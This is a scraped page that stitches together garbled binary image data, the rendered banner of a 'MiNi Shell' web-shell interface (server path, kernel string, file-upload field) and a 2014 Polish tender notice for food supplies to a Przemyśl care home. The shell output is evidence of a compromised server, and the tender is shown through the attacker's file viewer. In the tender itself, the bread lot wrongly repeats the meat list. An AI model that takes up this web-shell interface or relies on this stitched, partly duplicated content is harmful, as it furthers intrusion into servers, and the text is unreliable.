JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141209/403656-N-2014.html

<p class="kh_header"><b>Przemyśl: Dostawy artykułów spożywczych do Miejskiego Domu Pomocy Społecznej w Przemyślu</b><br>
<b>Numer ogłoszenia: 403656 - 2014; data zamieszczenia: 09.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Dom Pomocy Społecznej , Ul. Gen. J. Wysockiego 99, 37-700 Przemyśl, woj. podkarpackie, tel. 16 670 55 57, faks 16 670 55 57.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mdps.przemysl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych do Miejskiego Domu Pomocy Społecznej w Przemyślu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Różne artykuły spożywcze - 17 400 kg
II.	 Warzywa i owoce - 61 000kg
III.	 Ryby konserwowe i mrożone - 2235 kg
IV.	 Mięso i wędliny - 15 560 kg
V.	 Pieczywo - 25 365 kg.
VI.	 Warzywa i owoce mrożone - 6950 kg
VII.	 Jaja - 36 000 szt.
VIII.	 Nabiał - 22 795 kg.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.	Część I - Dostawa różnych artykułów spożywczych do Miejskiego Domu Pomocy Społecznej w Przemyślu - 10% wartości brutto umowy
2.	Część II - Dostawa warzyw i owoców do Miejskiego Domu Pomocy Społecznej w Przemyślu - 10% wartości brutto umowy
3.	Część III - Dostawa ryb konserwowych i ryb mrożonych do Miejskiego Domu Pomocy Społecznej w Przemyślu - 10% wartości brutto umowy
4.	Część IV - Dostawa mięs i wędlin do Miejskiego Domu Pomocy Społecznej w Przemyślu - 10% wartości brutto umowy
5.	Cześć V - Dostawa pieczywa do Miejskiego Domu Pomocy Społecznej 
w Przemyślu - 10% wartości brutto umowy
6.	Część VI - Dostaw warzy i owoców mrożonych do Miejskiego Domu Pomocy Społecznej w Przemyślu - 10% wartości brutto umowy
7.	Część VII - Dostawa jaj do Miejskiego Domu Pomocy Społecznej 
w Przemyślu - 10% wartości brutto umowy
8.	Część VIII - Dostawa nabiału do Miejskiego Domu Pomocy Społecznej 
w Przemyślu - 10% wartości brutto umowy</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> brak</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofert wg. załącznika nr 1 do SIWZ
2. Kosztorys ofertowy
3. Wypełniony formularz o zakresie prac wykonanych przez podwykonawców (jeżeli dotyczy)
4. Pełnomocnictwo (jeżeli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) w stosunku zakresu realizacji umowy w przypadku gdy konieczność wprowadzenia 
zmian, wynikła z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy np. zdarzeń losowych, zmiany przepisów; 
2) zmiana danych Wykonawcy (np. zmiana adresu, nazwy) lub zmiana wynikająca z przekształcenia podmiotowego po stronie Wykonawcy 
3) inne:
a. urzędowa zmiana stawki podatku VAT - w celu dostosowania do aktualnie  obowiązującej stawki - bez zmiany wartości netto produktów objętych zmianą 
jednak nie wcześniej niż po dacie rozpoczęcia jej obowiązywania. Zmiana umowy w tym zakresie może być wprowadzona tylko na wniosek Wykonawcy. Jednocześnie 
Wykonawca zobowiązuje się do przedstawienia Zamawiającemu podstawy prawnej 
do podwyższenia lub obniżenia cen towarów np. rozporządzenie, obwieszczenie, 
ustawa lub innej podstawy do zmiany cen - zmiany umowy. 
b. w przypadku zmiany powyżej 3% kwartalnego wskaźnika cen towarów i usług 
podawanego przez GUS, publikowanego w Monitorze Polskim, - o wielkość tegoż 
wskaźnika, jednak nie wcześniej niż po jego ogłoszeniu. Zmiana umowy w tym 
zakresie może być wprowadzona tylko na wniosek Wykonawcy. Jednocześnie 
Wykonawca zobowiązuje się do przedstawienia Zamawiającemu podstawy do 
podwyższenia lub obniżenia cen towarów np. rozporządzenie, obwieszczenie, 
ustawa lub innej podstawy prawnej do zmiany cen. 
c. w przypadku zmian przepisów ogólnie obowiązujących, które miałyby wpływ na 
treść umowy. 
d. w przypadku obniżenia cen producenta lub zastosowania promocyjnej obniżki cen, 
Zamawiający zastrzega sobie prawo zakupu asortymentu objętego umową po 
cenach odpowiednio obniżonych. 
e. w przypadku podwyższenia jakości parametrów lub innych cech 
charakterystycznych dla przedmiotu dostawy, w tym zmiana numeru katalogowego 
produktu lub nazwy własnej produktu pod warunkiem wprowadzenia na rynek 
produktu o wyższej jakości, lepszych parametrach lub innych korzystniejszych 
cechach charakterystycznych, przy zachowaniu ceny ofertowej dla danego 
produktu, na podstawie pisemnego wniosku Wykonawcy, pod warunkiem 
uzyskania zgody przez Zamawiającego. 
f. w przypadku zmiany sposobu konfekcjonowania towarów objętych umową, 
w przypadku zmiany wielkości opakowania wprowadzonej przez producenta 
z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową, pod 
warunkiem uzyskania zgody przez Zamawiającego. 
g. w przypadku wstrzymania lub zakończenia produkcji towarów będących 
przedmiotem dostawy, możliwość dostarczania odpowiedników towarów objętych 
umową, o parametrach nie gorszych niż towary objęte ofertą, przy zachowaniu 
ceny ofertowej dla danego towaru na podstawie pisemnego wniosku Wykonawcy, 
pod warunkiem uzyskania zgody przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mdps.przemysl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Dom Pomocy Społecznej 37-700 Przemyśl, ul. Gen. J. Wysockiego 99,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2014 godzina 09:00, miejsce: Miejski Dom Pomocy Społecznej 37-700 Przemyśl, ul. Gen. J. Wysockiego 99, Budynek Administracji - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Różne artykuły Spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budyń bez cukru op. 40g	kg	60
Chrzan op. 260 - 400g	kg	25
Ciastka bezcukrowe - Herbatniki op. 73g	kg	40
Ciastka bezcukrowe - wafelki z nadzieniem op. 110g	kg	44
Ciastka biszkoptowe op. 150g - 1kg	kg	150
Ciastka piernik w glazurze op. 1kg	kg	120
Cukier op. 1kg	kg	4750
Dżem niskosłodzony op. 270g - 900g 	kg	350
Dżem wysokosłodzony op. 270g - 900g	kg	400
Groszek konserwowy op. 400g - 500g	kg	120
Herbata czarna granulowana op. 100g	kg	240
Kakao typu holenderskiego op. 100g - 200g	kg	25
Kasza gryczana 	kg	350
Kasza jęczmienna	kg	220
Kasza manna	kg	420
Kawa zbożowa rozpuszczalna typu Inka op.150g	kg	35
Ketchup 500ml łagodny - (zwartość pomidorów w 100g produktu nie mniej niż 190g)	kg	210
Kisiel bez cukru op. 40g	kg	55
Koncentrat pomidorowy 30% op. 200g - 900g	kg	420
Krem czekoladowy - (zwartość odtłuszczonego kakao nie mniej niż 5%) op. 200g - 400g	kg	200
Kukurydza konserwowa op. 400g 	kg	30
Kwasek cytrynowy op. 20g	kg	9
Majonez - (zawartość żółtka jaj nie mniej niż 5%) op. 600ml - 800ml	kg	290
Makaron domowy  op. 1kg	kg	1000
Makaron nitka jajeczny op. 250g - 500g	kg	300
Makaron zacierka jajeczny op. 250g. - 500g	kg	150
Margaryna mleczna op. 250g	kg	320
Margaryna śniadaniowa z masłem op. 250g - 500g	kg	750
Marmolada wieloowocowa op. 1 -1.5kg	kg	650
Mąka pszenna typ 500%	kg	1300
Mąka ziemniaczana	kg	60
Musztarda op. 200g 	kg	100
Ocet op. 500ml	l	60
Ogórek kiszony op. 900g	kg	350
Ogórek konserwowy op. 900g	kg	460
Olej rzepakowy, sojowy op. 1L	l	600
Pieczarka marynowana op. 900g	kg	80
Płatki owsiane 	kg	350
Powidło śliwkowe op. 260g - 900g	kg	300
Ryż op. 1kg	kg	1500
Seler marynowany op. 900g	kg	250
Żelatyna op. 20g 	kg	10
Żurek słoik op. 350g - 400g	kg	180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Buraki	kg	3000
Banany	kg	1500
Cebula	kg	1100
Cebulka zielona - pęczek	szt.	400
Cytryna	kg	720
Czosnek	kg	10
Fasola typu Jaś Piękny - sucha 	kg	250
Jabłka deserowe	kg	5000
Jabłka kompotowe	kg	200
Kapusta biała	kg	1500
Kapusta czerwona	kg	50
Kapusta kiszona	kg	600
Kapusta pekińska	kg	560
Mandarynka	kg	250
Marchew	kg	5000
Ogórek świeży	kg	500
Pieczarka - świeża	kg	140
Pietruszka korzeń	kg	950
Pietruszka natka - pęczek	szt.	700
Pomarańcze	kg	900
Pomidory	kg	1800
Por	kg	200
Rzodkiewka - pęczek	szt.	1500
Sałata zielona	szt.	900
Seler korzeń	kg	900
Szczypior - pęczek	szt.	300
Ziemniaki	kg	35 000
Koper zielony pęczek	szt.	800
Kalafior świeży oczyszczony	kg	100
Arbuz	kg	250
Brzoskwinia	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ryby konserwowe i mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet Dorsz mrożony	kg	730
Panga filet mrożony	kg	550
Konserwa, filet makreli 
w pomidorach op. 170g -180g	kg	255
Konserwa, filet z Makreli w oleju op. 170g - 180g	kg	170
Makrela wędzona	kg	150
Konserwa sałatka z makreli  op 300g - 340g	kg	46
Konserwa Tuńczyk w kawałkach w oleju op. 170g - 180g	kg	50
Konserwa Szprot w pomidorach op. 300g - 330g	kg	100
Filet śledziowy marynowany op. 2.5kg - 3kg	kg	180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Antrykot - świeży	kg	500
Baleron gotowany	kg	120
Boczek gotowany	kg	70
Filet z indyka bez kości bez skóry	kg	500
Filet z kurczaka bez kości bez skóry	kg	700
Flaki wołowe mrożone krojone	kg	150
Karczek bez kości	kg	180
Kiełbasa krakowska parzona	kg	250
Kiełbasa mortadela	kg	500
Kiełbasa parówkowa z szynki	kg	600
Kiełbasa szynkowa z indyka 	kg	600
Kiełbasa wiejska 	kg	75
Kiełbasa zwyczajna 	kg	340
Kiszka (krupniok) w jelicie cienkim	kg	130
Konserwa pasztet z drobiu smakowe op. 120g - 160g	kg	364
Kości wieprzowe od schabu  /pokrzep	kg	1000
Kurczak świeży	kg	1200
Lencz	kg	200
Łopatka wieprzowa bez kości	kg	500
Mięso udowe z indyka bez kości bez skóry 	kg	800
Noga z kurczaka świeża	kg	1000
Parówki drobiowe 	kg	530
Pasztet pieczony 	kg	200
Pasztetowa kremowa	kg	100
Polędwica sopocka WP	kg	450
Porcja rosołowa	kg	500
Salceson drobiowy	kg	300
Kiełbasa Żywiecka	kg	100
Schab bez kości	kg	700
Słonina	kg	6
Smalec	kg	65
Szynka drobiowa 	kg	550
Szynka pieczona wieprzowa	kg	450
Szynka wiejska gotowana wieprzowa	kg	250
Szynka wieprzowa gotowana	kg	250
Wątroba z drobiu	kg	100
Żeberka paski	kg	200
Noga z kruczka mrożona	kg	300
Kurczak mrożony	kg	200
Konserwa pasztet wieprzowy op. 250g - 300g	kg	30
Mięso szynka WP bez kości	kg	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Antrykot - świeży	kg	500
Baleron gotowany	kg	120
Boczek gotowany	kg	70
Filet z indyka bez kości bez skóry	kg	500
Filet z kurczaka bez kości bez skóry	kg	700
Flaki wołowe mrożone krojone	kg	150
Karczek bez kości	kg	180
Kiełbasa krakowska parzona	kg	250
Kiełbasa mortadela	kg	500
Kiełbasa parówkowa z szynki	kg	600
Kiełbasa szynkowa z indyka 	kg	600
Kiełbasa wiejska 	kg	75
Kiełbasa zwyczajna 	kg	340
Kiszka (krupniok) w jelicie cienkim	kg	130
Konserwa pasztet z drobiu smakowe op. 120g - 160g	kg	364
Kości wieprzowe od schabu  /pokrzep	kg	1000
Kurczak świeży	kg	1200
Lencz	kg	200
Łopatka wieprzowa bez kości	kg	500
Mięso udowe z indyka bez kości bez skóry 	kg	800
Noga z kurczaka świeża	kg	1000
Parówki drobiowe 	kg	530
Pasztet pieczony 	kg	200
Pasztetowa kremowa	kg	100
Polędwica sopocka WP	kg	450
Porcja rosołowa	kg	500
Salceson drobiowy	kg	300
Kiełbasa Żywiecka	kg	100
Schab bez kości	kg	700
Słonina	kg	6
Smalec	kg	65
Szynka drobiowa 	kg	550
Szynka pieczona wieprzowa	kg	450
Szynka wiejska gotowana wieprzowa	kg	250
Szynka wieprzowa gotowana	kg	250
Wątroba z drobiu	kg	100
Żeberka paski	kg	200
Noga z kruczka mrożona	kg	300
Kurczak mrożony	kg	200
Konserwa pasztet wieprzowy op. 250g - 300g	kg	30
Mięso szynka WP bez kości	kg	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Warzywa i owoce mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuły mrożone 2.5kg	kg	400
Fasola szparagowa mrożona 2.5kg	kg	350
Jarzynka mrożona 2.5kg	kg	2000
Kalafior mrożony 2.5kg	kg	1200
Marchew mrożona 2.5kg	kg	800
Mieszanka kompotowa z truskawką 2.5kg	kg	1100
Mieszanka kompotowa 2.5kg	kg	1100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jajo świeże średnie	szt.	36 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jogurt naturalny op. 150g -200g	kg	1440
Jogurt owocowy op. 125g  - 150g o zawartości 1.5% tłuszczu	kg	1000
Kefir op. 200g -400g	kg	480
Masło roślinne op. 250g	kg	350
Masło zawartość tłuszczu 82% op. 200g	kg	1500
Masło zawartość tłuszczu 82% - op. 20g	kg	100
Mleko folia 2% tłuszczu op. 1L	l	10 000
Mleko w proszku op 0.5kg 26% tłuszczu	kg	250
Ser topiony od 26%  - 30% tłuszczu kremowy różne smaki	kg	200
Ser topiony o obniżonej zwartości tłuszczu różne smaki	kg	150
Ser twarogowy chudy krajanka	kg	1700
Ser twarogowy półtłusty krajanka	kg	900
Ser żółty 45% tłuszczu typu edamski nie gorszy	kg	500
Serek owocowy op. 125g -150g	kg	1125
Serek wiejski ziarnisty op. 180g -220g	kg	800
Śmietana 18% tłuszczu op. 450ml do 1000ml	l	1300
Śmietana 24% tłuszczu op. 450ml do 1000ml	l	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
